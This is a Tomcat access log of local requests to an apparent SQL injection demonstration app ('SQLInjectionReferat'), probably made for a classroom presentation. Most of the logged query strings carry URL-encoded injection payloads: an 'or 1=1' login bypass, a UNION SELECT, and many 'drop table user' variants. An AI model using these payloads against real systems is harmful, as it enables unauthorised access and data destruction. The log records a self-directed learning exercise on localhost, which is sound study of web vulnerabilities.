0:0:0:0:0:0:0:1 - - [16/Jan/2019:14:33:21 +0200] "GET /SQLInjectionReferat HTTP/1.1" 302 - http-bio-8080-exec-1 0
0:0:0:0:0:0:0:1 - - [16/Jan/2019:14:33:21 +0200] "GET /SQLInjectionReferat/ HTTP/1.1" 200 7070 http-bio-8080-exec-3 46
0:0:0:0:0:0:0:1 - - [16/Jan/2019:14:33:21 +0200] "GET /SQLInjectionReferat/database.JPG HTTP/1.1" 200 144174 http-bio-8080-exec-4 20
0:0:0:0:0:0:0:1 - - [16/Jan/2019:14:33:37 +0200] "GET /SQLInjectionReferat/userCheck?username=something%27+or+1%3D1+--&password=%27 HTTP/1.1" 200 127 http-bio-8080-exec-5 2152
0:0:0:0:0:0:0:1 - - [16/Jan/2019:14:33:53 +0200] "GET /SQLInjectionReferat/userCheck?username=something%27+or+1%3D1+--&password=%27 HTTP/1.1" 200 660 http-bio-8080-exec-7 147
0:0:0:0:0:0:0:1 - - [16/Jan/2019:14:34:20 +0200] "GET /SQLInjectionReferat/userCheckCorrection?username=something%27+or+1%3D1+--&password=%27 HTTP/1.1" 200 208 http-bio-8080-exec-9 23
0:0:0:0:0:0:0:1 - - [16/Jan/2019:14:34:57 +0200] "GET /SQLInjectionReferat/example0?username=%27ramki%27+UNION+SELECT+*+FROM+User+Where+%271%27%3D%271%27+ HTTP/1.1" 200 669 http-bio-8080-exec-9 76
0:0:0:0:0:0:0:1 - - [16/Jan/2019:14:35:41 +0200] "GET /SQLInjectionReferat/userCheck?username=%27sandeep%27&password=%27%27%3Bdrop+table+user HTTP/1.1" 200 214 http-bio-8080-exec-9 17
0:0:0:0:0:0:0:1 - - [16/Jan/2019:14:38:41 +0200] "GET /SQLInjectionReferat/userCheck?username=sandeep%27+and+1%3D1+--&password=%27 HTTP/1.1" 200 247 http-bio-8080-exec-3 9
0:0:0:0:0:0:0:1 - - [16/Jan/2019:14:40:49 +0200] "GET /SQLInjectionReferat/ HTTP/1.1" 200 7097 http-bio-8080-exec-4 603
0:0:0:0:0:0:0:1 - - [16/Jan/2019:14:40:49 +0200] "GET /favicon.ico HTTP/1.1" 404 - http-bio-8080-exec-4 0
0:0:0:0:0:0:0:1 - - [16/Jan/2019:14:41:20 +0200] "GET /SQLInjectionReferat/userCheck?username=sandeep&password=%27%3Bdrop+table+user HTTP/1.1" 200 211 http-bio-8080-exec-4 16
0:0:0:0:0:0:0:1 - - [16/Jan/2019:14:43:07 +0200] "GET /SQLInjectionReferat/ HTTP/1.1" 200 7098 http-bio-8080-exec-2 57
0:0:0:0:0:0:0:1 - - [16/Jan/2019:14:43:18 +0200] "GET /SQLInjectionReferat/userCheck?username=sandeep&password=%27%3Bdrop+table+user+--+ HTTP/1.1" 200 215 http-bio-8080-exec-2 17
0:0:0:0:0:0:0:1 - - [16/Jan/2019:14:44:31 +0200] "GET /SQLInjectionReferat/userCheck?username=sandeep&password=%27%3Bdrop+table+user+%27+--+ HTTP/1.1" 200 217 http-bio-8080-exec-10 17
0:0:0:0:0:0:0:1 - - [16/Jan/2019:14:44:47 +0200] "GET /SQLInjectionReferat/userCheck?username=sandeep&password=%3Bdrop+table+user++--+ HTTP/1.1" 200 234 http-bio-8080-exec-10 8
0:0:0:0:0:0:0:1 - - [16/Jan/2019:14:44:59 +0200] "GET /SQLInjectionReferat/userCheck?username=sandeep&password=%3Bdrop+table+user++--+ HTTP/1.1" 200 234 http-bio-8080-exec-10 5
0:0:0:0:0:0:0:1 - - [16/Jan/2019:14:45:38 +0200] "GET /SQLInjectionReferat/userCheck?username=sandeep&password=%27%3Bdrop+table+user++--+ HTTP/1.1" 200 216 http-bio-8080-exec-10 17
0:0:0:0:0:0:0:1 - - [16/Jan/2019:14:46:08 +0200] "GET /SQLInjectionReferat/userCheck?username=sandeep&password=%27%3Bdrop+table+user+---+ HTTP/1.1" 200 216 http-bio-8080-exec-10 15
0:0:0:0:0:0:0:1 - - [16/Jan/2019:14:49:09 +0200] "GET /SQLInjectionReferat/userCheck?username=sandeep&password=%27%3Bdrop+table+user+--+ HTTP/1.1" 200 215 http-bio-8080-exec-9 21
0:0:0:0:0:0:0:1 - - [16/Jan/2019:14:49:54 +0200] "GET /SQLInjectionReferat/userCheck?username=sandeep%27%3Bdrop+table+user+--&password=%27 HTTP/1.1" 200 215 http-bio-8080-exec-9 29
0:0:0:0:0:0:0:1 - - [16/Jan/2019:14:50:13 +0200] "GET /SQLInjectionReferat/userCheck?username=sandeep%27%3Bdrop+table+user+--&password=%27 HTTP/1.1" 200 215 http-bio-8080-exec-9 20
0:0:0:0:0:0:0:1 - - [16/Jan/2019:14:51:23 +0200] "GET /SQLInjectionReferat/userCheck?username=sandeep%3Bdrop+table+user+--&password=%27 HTTP/1.1" 200 214 http-bio-8080-exec-3 16
0:0:0:0:0:0:0:1 - - [16/Jan/2019:14:51:30 +0200] "GET /SQLInjectionReferat/ HTTP/1.1" 200 7098 http-bio-8080-exec-3 4
0:0:0:0:0:0:0:1 - - [16/Jan/2019:14:52:02 +0200] "GET /SQLInjectionReferat/userCheck?username=sandeep%3B+drop+table+user&password=%27 HTTP/1.1" 200 212 http-bio-8080-exec-3 15
0:0:0:0:0:0:0:1 - - [16/Jan/2019:14:52:32 +0200] "GET /SQLInjectionReferat/userCheck?username=sandeep%27%3B+drop+table+user+%27&password=%27 HTTP/1.1" 200 215 http-bio-8080-exec-3 15
